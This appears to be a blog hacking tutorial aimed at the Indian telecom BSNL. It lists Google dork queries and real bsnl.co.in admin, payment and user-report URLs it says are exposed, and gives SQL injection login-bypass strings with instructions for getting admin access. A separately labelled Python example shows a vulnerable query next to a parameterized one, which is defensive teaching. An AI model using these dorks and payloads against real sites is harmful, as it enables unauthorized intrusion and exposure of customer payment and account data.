Disclaimer: The information provided below is for educational purposes only. The author is not responsible for any misuse of the information and discourages any illegal use of it.
Yes, we shall hack the BSNL website easily, easily enough for a nursery kid. We shall be using Google hacking and SQL injection techniques.
So let's begin.
Search for this in Google:
inurl:bsnl.co.in/admin
On the search results, go to the second page. You will see plenty of links of the type:
Open that link and you will see lots of source code files.
Many of the links on this page show good information, like:
Payment information – http://www.billchn.bsnl.co.in/admin/consol.jsp
Transaction information – http://www.billchn.bsnl.co.in/admin/consolidatedreport.jsp
Registered user page – http://www.billchn.bsnl.co.in/admin/registereduser.jsp
Even an administration page is available without login:
http://billchn.bsnl.co.in/modifypassword.jsp
and here:
Check out what can be hacked from there.
So you hacked into bsnl servers and found some information that should be password protected. If you are a creative hacker then try getting into the system with a proper login.
This is the login page:
http://www.billchn.bsnl.co.in/adminlogin.html
Another Google hacking search term:
site:bsnl.co.in inurl:admin
Search for the above and you might get some more interesting links, like:
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=admin
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_17&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=DE+ADMIN
http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_5&selected_faculty=admin
The above links appear to be pages that should have been password protected, but they are publicly visible.
Want to hack more?
Search for this:
site:bsnl.co.in inurl:login
and you will find URLs like:
All the above URLs are vulnerable to SQL injection. Enter the following as both username and password:
' or '1'='1
and you should be logged in. Happy hacking!!
Try this URL:
http://udaan.bsnl.co.in/
with username/password as:
' or '1'='1' -- '
Here is a screenshot:
Want to hack more? Still not satisfied? OK.
Open this URL:
and log in with
' or '1'='1' -- '
as username and password, and you would be logged in as admin. Here is a screenshot:
Funny, isn't it?
Want another website? Sure:
Log in with:
' or '1'='1' -- '
as the username and abcd as the password. You should get logged in and the Administration Panel should be available.
Here is a screenshot:
Well done once again Bsnl!!
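Why the quote-based logins above succeed, and how a site owner closes the hole, shown as an added example that is not part of the original post and is not BSNL's code: a login query built by string concatenation next to the same query with bound parameters. The table, column names and credentials are constructed for illustration, and the password column is plaintext only to keep the query short (a real system stores a salted hash).

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so a quote in it ends the string
    # literal and whatever follows is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, username, password):
    # Placeholders bind input as data; the statement's structure is fixed
    # before any user input is seen.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# The two strings quoted on this page.
TAUTOLOGY = "' or '1'='1"          # makes the WHERE clause always true
COMMENT_OUT = "' or '1'='1' -- '"  # also comments out the password check

def demo():
    db = make_db()
    attempts = [
        ("admin", "S3cret-constructed"),  # correct credentials
        ("admin", "wrong"),               # wrong password
        (TAUTOLOGY, TAUTOLOGY),           # same string in both fields
        (COMMENT_OUT, "abcd"),            # password value is irrelevant
    ]
    # Each pair is (user seen by the vulnerable query, by the bound query).
    return [(login_vulnerable(db, u, p), login_parameterized(db, u, p))
            for u, p in attempts]

if __name__ == "__main__":
    for pair in demo():
        print(pair)
```

With bound parameters both strings are compared literally against the username column and match no row, so the login is refused.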
Very nice